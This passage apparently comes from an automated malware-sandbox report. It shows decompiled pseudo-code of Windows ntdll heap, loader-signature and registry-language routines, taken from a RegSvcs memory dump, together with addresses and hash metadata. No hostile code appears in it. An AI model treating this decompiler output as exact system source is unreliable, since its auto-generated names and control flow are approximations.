				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E013BA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x13e8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E012FB150();
					__eflags =  *0x13e7bc8;
					if(__eflags == 0) {
						E013B2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E013BA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x13e8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x13e8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0131B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E013BA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0131E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                          0x0131b746
                                          0x0131b74b
                                          0x0131b74d
                                          0x0131b750
                                          0x0131b755
                                          0x0131b758
                                          0x0131b758
                                          0x0131b75e
                                          0x0131b763
                                          0x0131b764
                                          0x0131b76a
                                          0x0131b76d
                                          0x0131b771
                                          0x0131b776
                                          0x0131b85c
                                          0x0131b85d
                                          0x0131b860
                                          0x0131b865
                                          0x01362ba1
                                          0x01362ba2
                                          0x01362ba9
                                          0x01362bae
                                          0x01362bae
                                          0x0131b77c
                                          0x0131b77c
                                          0x0131b77c
                                          0x0131b785
                                          0x0131b788
                                          0x01362bb6
                                          0x01362bb9
                                          0x00000000
                                          0x00000000
                                          0x01362bbf
                                          0x01362bc5
                                          0x01362bc9
                                          0x01362be8
                                          0x01362bed
                                          0x01362bcb
                                          0x01362be0
                                          0x01362be5
                                          0x01362bf3
                                          0x01362bf8
                                          0x01362bfd
                                          0x01362c05
                                          0x01362c0e
                                          0x01362c0e
                                          0x00000000
                                          0x0131b78e
                                          0x0131b78e
                                          0x0131b78e
                                          0x0131b791
                                          0x0131b791
                                          0x0131b797
                                          0x0131b797
                                          0x0131b79f
                                          0x0131b7a9
                                          0x0131b7af
                                          0x0131b7af
                                          0x0131b7b1
                                          0x0131b7b6
                                          0x0131b7e2
                                          0x0131b7e2
                                          0x0131b7e7
                                          0x0131b880
                                          0x0131b7ed
                                          0x0131b7ed
                                          0x0131b7ed
                                          0x0131b7ef
                                          0x0131b7f2
                                          0x0131b7f2
                                          0x0131b7f5
                                          0x0131b7fa
                                          0x01362c2d
                                          0x01362c2e
                                          0x01362c39
                                          0x0131b800
                                          0x0131b800
                                          0x0131b802
                                          0x0131b805
                                          0x0131b808
                                          0x0131b808
                                          0x0131b80a
                                          0x0131b80d
                                          0x0131b816
                                          0x0131b81c
                                          0x0131b822
                                          0x0131b82f
                                          0x0131b88b
                                          0x0131b892
                                          0x0131b897
                                          0x0131b899
                                          0x0131b89b
                                          0x0131b89e
                                          0x0131b8a5
                                          0x0131b8a8
                                          0x0131b8aa
                                          0x0131b8ac
                                          0x0131b8ac
                                          0x0131b8aa
                                          0x0131b892
                                          0x0131b831
                                          0x0131b839
                                          0x0131b83b
                                          0x0131b83b
                                          0x0131b844
                                          0x0131b84b
                                          0x0131b852
                                          0x0131b7b8
                                          0x0131b7ba
                                          0x0131b7bf
                                          0x0131b7c4
                                          0x01362c18
                                          0x01362c19
                                          0x01362c23
                                          0x0131b7ca
                                          0x0131b7ca
                                          0x0131b7cc
                                          0x0131b7cf
                                          0x0131b7d1
                                          0x0131b7d1
                                          0x0131b7d4
                                          0x0131b7dc
                                          0x0131b8bb
                                          0x0131b8bb
                                          0x0131b8be
                                          0x0131b8be
                                          0x0131b8c1
                                          0x00000000
                                          0x00000000
                                          0x0131b8c3
                                          0x0131b8c5
                                          0x0131b8c7
                                          0x0131b8e0
                                          0x00000000
                                          0x0131b8e0
                                          0x0131b8cc
                                          0x0131b8cc
                                          0x00000000
                                          0x0131b8cc
                                          0x0131b8d6
                                          0x0131b8d6
                                          0x00000000
                                          0x0131b7dc
                                          0x0131b7b6

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          • Opcode ID: 249479818377debb4ff128afdc10abb03de94c9cdb8f3b2a0e45c7f548a6378c
                                          • Instruction ID: 747c047b5e2fe30b50742a6b2ccb9c56bd0843afff0c6dadf7478b9c43c64cce
                                          • Opcode Fuzzy Hash: 249479818377debb4ff128afdc10abb03de94c9cdb8f3b2a0e45c7f548a6378c
                                          • Instruction Fuzzy Hash: F761AC706002459FDB2DCF28C484B6AFBF5FF04718F18856EE8498B65AD730E891CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01307E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E01307E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0130CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E012FC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x13e5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01375510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x13e5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01317D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01317D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01377016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01317D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01317D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01377016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0132A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E012FB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                          0x01307e4c
                                          0x01307e50
                                          0x01307e55
                                          0x01307e58
                                          0x01307e5d
                                          0x01307e71
                                          0x01307f33
                                          0x01307e77
                                          0x01307e77
                                          0x01307e79
                                          0x01307e79
                                          0x01307e7e
                                          0x01307f45
                                          0x01359848
                                          0x00000000
                                          0x01359848
                                          0x01307f4e
                                          0x01307f53
                                          0x01307f5a
                                          0x00000000
                                          0x00000000
                                          0x0135985a
                                          0x01359862
                                          0x01359866
                                          0x00000000
                                          0x0135986c
                                          0x00000000
                                          0x0135986c
                                          0x01307e84
                                          0x01307e84
                                          0x01307e8d
                                          0x01359871
                                          0x01307eb8
                                          0x01307ec0
                                          0x01307ec0
                                          0x01307e9a
                                          0x0135987e
                                          0x00000000
                                          0x00000000
                                          0x01359884
                                          0x0135988b
                                          0x013598a7
                                          0x013598ac
                                          0x013598b1
                                          0x013598b6
                                          0x013598b8
                                          0x013598b8
                                          0x013598b9
                                          0x00000000
                                          0x013598b9
                                          0x01307ea0
                                          0x01307ea7
                                          0x00000000
                                          0x00000000
                                          0x01307eac
                                          0x01307eb1
                                          0x01307ec6
                                          0x01307ed0
                                          0x013598cc
                                          0x01307ed6
                                          0x01307ed6
                                          0x01307ed6
                                          0x01307ede
                                          0x01307ee3
                                          0x013598e3
                                          0x013598f0
                                          0x01359902
                                          0x013598f2
                                          0x013598fb
                                          0x013598fb
                                          0x01359907
                                          0x0135991d
                                          0x0135991d
                                          0x01359907
                                          0x013598e3
                                          0x01307ef0
                                          0x01307f14
                                          0x01307f14
                                          0x01307f1e
                                          0x01359946
                                          0x01307f24
                                          0x01307f24
                                          0x01307f24
                                          0x01307f2c
                                          0x0135996a
                                          0x01359975
                                          0x01359975
                                          0x0135997e
                                          0x01359993
                                          0x01359993
                                          0x0135997e
                                          0x00000000
                                          0x01307ef2
                                          0x01307efc
                                          0x01307f0a
                                          0x01307f0e
                                          0x01359933
                                          0x00000000
                                          0x01359933
                                          0x00000000
                                          0x01307f0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01307eb1

                                          Strings
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01359891
                                          • minkernel\ntdll\ldrmap.c, xrefs: 013598A2
                                          • LdrpCompleteMapModule, xrefs: 01359898
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 6f23a4eff4dc34dc57231fb050b9bdfc42cd234458e42cd320fac9a63a2d20df
                                          • Instruction ID: 6933552b9c0438fa202d6952a071ddb70ca1a958750a084a8601e14414a96282
                                          • Opcode Fuzzy Hash: 6f23a4eff4dc34dc57231fb050b9bdfc42cd234458e42cd320fac9a63a2d20df
                                          • Instruction Fuzzy Hash: C451F13160174ADBEB22CB6CC954F2ABBE8AB0071CF1406A9E9959B7D2D774FD00C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013A23E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E013A23E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x13e874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x13e874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0134D4F0(_t83, 0x12d6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E012FB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x13e6378 = 1;
						asm("int3");
						 *0x13e6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                          0x013a23e3
                                          0x013a23e8
                                          0x013a23eb
                                          0x013a23ee
                                          0x013a23f3
                                          0x013a259b
                                          0x013a259b
                                          0x013a259d
                                          0x013a25a3
                                          0x013a25a3
                                          0x013a23fb
                                          0x013a2424
                                          0x013a244f
                                          0x013a2460
                                          0x013a2451
                                          0x013a2451
                                          0x013a2456
                                          0x013a2458
                                          0x013a2458
                                          0x013a245b
                                          0x013a245b
                                          0x013a2426
                                          0x013a2431
                                          0x013a2436
                                          0x013a2443
                                          0x013a2438
                                          0x013a2438
                                          0x013a2438
                                          0x013a2445
                                          0x013a2445
                                          0x013a2463
                                          0x013a2469
                                          0x013a246f
                                          0x013a2480
                                          0x013a2495
                                          0x013a24a1
                                          0x013a24ce
                                          0x013a24df
                                          0x013a24d0
                                          0x013a24d0
                                          0x013a24d5
                                          0x013a24d7
                                          0x013a24d7
                                          0x013a24da
                                          0x013a24da
                                          0x013a24a3
                                          0x013a24b0
                                          0x013a24b5
                                          0x013a24c2
                                          0x013a24b7
                                          0x013a24b7
                                          0x013a24b7
                                          0x013a24c4
                                          0x013a24c4
                                          0x013a24e8
                                          0x013a2497
                                          0x013a249a
                                          0x013a249a
                                          0x013a2482
                                          0x013a2488
                                          0x013a2488
                                          0x013a2471
                                          0x013a2479
                                          0x013a2479
                                          0x013a24ef
                                          0x013a23fd
                                          0x013a2401
                                          0x013a2412
                                          0x013a2403
                                          0x013a2403
                                          0x013a2408
                                          0x013a240a
                                          0x013a240a
                                          0x013a240d
                                          0x013a240d
                                          0x013a241b
                                          0x013a241b
                                          0x013a24f1
                                          0x013a24f6
                                          0x013a2507
                                          0x013a2510
                                          0x00000000
                                          0x013a2510
                                          0x013a250b
                                          0x00000000
                                          0x013a24f8
                                          0x013a24f8
                                          0x013a24fc
                                          0x013a2500
                                          0x013a2512
                                          0x013a2515
                                          0x013a251a
                                          0x013a2521
                                          0x013a2524
                                          0x013a2529
                                          0x013a252f
                                          0x00000000
                                          0x00000000
                                          0x013a253c
                                          0x013a255c
                                          0x013a2561
                                          0x013a253e
                                          0x013a2554
                                          0x013a2559
                                          0x013a256a
                                          0x013a256d
                                          0x013a2574
                                          0x013a2586
                                          0x013a2588
                                          0x013a258f
                                          0x013a2590
                                          0x013a2590
                                          0x013a2597
                                          0x00000000
                                          0x013a2597

                                          Strings
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 013A256F
                                          • HEAP: , xrefs: 013A255C
                                          • HEAP[%wZ]: , xrefs: 013A254F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: 60322b16f9c00925790da55f67c019876eb3a9e39e9760fa8c5ee215671a129c
                                          • Instruction ID: 6d891c74c817b942070a17dda9a31c41af09e6dc66146d0949535292c389282b
                                          • Opcode Fuzzy Hash: 60322b16f9c00925790da55f67c019876eb3a9e39e9760fa8c5ee215671a129c
                                          • Instruction Fuzzy Hash: 93512434110264CAE374CE2EC8447B3BBF6EB5864CFD5489DE9C29B685D239D847DB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E012FE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E012FF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E013395D0();
						}
						if(_t78 != 0) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0133FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0133BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01339600();
					if(_t97 < 0) {
						goto L6;
					}
					E0133BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L012FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0133BB40(_t83, _t102 + 0x24, _t78);
								if(L013043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0133BB40(_t84, _t102 + 0x24, _t94);
									if(L013043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                          0x012fe620
                                          0x012fe628
                                          0x012fe62f
                                          0x012fe631
                                          0x012fe635
                                          0x012fe637
                                          0x012fe63e
                                          0x01355503
                                          0x01355503
                                          0x012fe64c
                                          0x012fe64c
                                          0x012fe651
                                          0x00000000
                                          0x00000000
                                          0x012fe661
                                          0x012fe665
                                          0x0135542a
                                          0x012fe715
                                          0x012fe71a
                                          0x012fe71c
                                          0x012fe720
                                          0x012fe720
                                          0x012fe727
                                          0x012fe736
                                          0x012fe736
                                          0x012fe743
                                          0x012fe743
                                          0x012fe673
                                          0x012fe678
                                          0x012fe67d
                                          0x012fe682
                                          0x012fe685
                                          0x012fe692
                                          0x012fe69b
                                          0x012fe6a3
                                          0x012fe6ad
                                          0x012fe6b1
                                          0x012fe6b2
                                          0x012fe6bb
                                          0x012fe6bf
                                          0x012fe6c0
                                          0x012fe6c8
                                          0x012fe6cc
                                          0x012fe6d5
                                          0x012fe6d9
                                          0x00000000
                                          0x00000000
                                          0x012fe6e5
                                          0x012fe6ea
                                          0x012fe6f9
                                          0x012fe70b
                                          0x012fe70f
                                          0x01355439
                                          0x0135545e
                                          0x0135545e
                                          0x00000000
                                          0x0135545e
                                          0x0135543b
                                          0x0135543e
                                          0x01355440
                                          0x01355445
                                          0x01355472
                                          0x01355475
                                          0x0135548d
                                          0x01355493
                                          0x013554a9
                                          0x00000000
                                          0x00000000
                                          0x013554ab
                                          0x013554b4
                                          0x013554bc
                                          0x013554c8
                                          0x013554de
                                          0x013554fb
                                          0x013554e0
                                          0x013554e6
                                          0x013554eb
                                          0x013554eb
                                          0x013554de
                                          0x00000000
                                          0x013554bc
                                          0x01355477
                                          0x0135547a
                                          0x01355480
                                          0x01355483
